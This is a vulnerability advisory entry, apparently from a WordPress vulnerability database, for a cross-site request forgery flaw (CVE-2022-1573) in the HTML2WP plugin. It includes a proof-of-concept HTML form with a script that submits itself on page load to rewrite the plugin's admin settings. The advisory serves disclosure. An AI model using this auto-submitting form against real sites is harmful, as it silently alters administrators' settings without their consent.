WordPress Plugin Vulnerabilities

HTML2WP <= 1.0.0 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=html2wp-settings" method="post">
    <input type="text" name="import_settings[type]" value="page">
    <input type="text" name="import_settings[parent]" value="0">
    <input type="text" name="import_settings[template]" value="default">
    <input type="text" name="import_settings[status]" value="publish">
    <input type="text" name="import_settings[author]" value="1">
    <input type="text" name="import_settings[content_by]" value="all_file">
    <input type="text" name="import_settings[content_by_tag]" value="">
    <input type="text" name="import_settings[content_by_att]" value="">
    <input type="text" name="import_settings[content_by_val]" value="">
    <input type="text" name="import_settings[title_by]" value="file_name">
    <input type="text" name="import_settings[title_by_tag]" value="">
    <input type="text" name="import_settings[title_by_att]" value="">
    <input type="text" name="import_settings[title_by_val]" value="">
    <input type="text" name="import_settings[replace_a_href_from]" value="">
    <input type="text" name="import_settings[replace_a_href_to]" value="">
    <input type="text" name="import_settings[replace_css_href_from]" value="">
    <input type="text" name="import_settings[replace_css_href_to]" value="">
    <input type="text" name="import_settings[replace_img_src_from]" value="aaa">
    <input type="text" name="import_settings[replace_img_src_to]" value="bbb">
    <input type="text" name="import_settings[replace_script_src_from]" value="">
    <input type="text" name="import_settings[replace_script_src_to]" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
html2wp
No known fix

References

CVE
CVE-2022-1573

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
9c1acd9c-999f-4a35-a272-1ad31552e685

Timeline

Publicly Published
2022-06-02 (about 1 years ago)
Added
2022-06-02 (about 1 years ago)
Last Updated
2023-03-05 (about 8 months ago)

Other

Published
Title
Published
2023-11-16
Title
Legal Pages < 1.3.9 - Cross-Site Request Forgery via moveToTrash and fetch_and_insert_template_data
Published
2021-07-12
Title
Remove Footer Credit < 1.0.6 - CSRF to Stored Cross-Site Scripting
Published
2020-12-11
Title
Ultimate Category Excluder < 1.2 - Cross-Site Request Forgery
Published
2023-03-30
Title
JustTables – WooCommerce Product Table < 1.5.0 - Cross-Site Request Forgery
Published
2023-03-21
Title
Update Image Tag Alt Attribute <= 2.4.5 - Cross-Site Request Forgery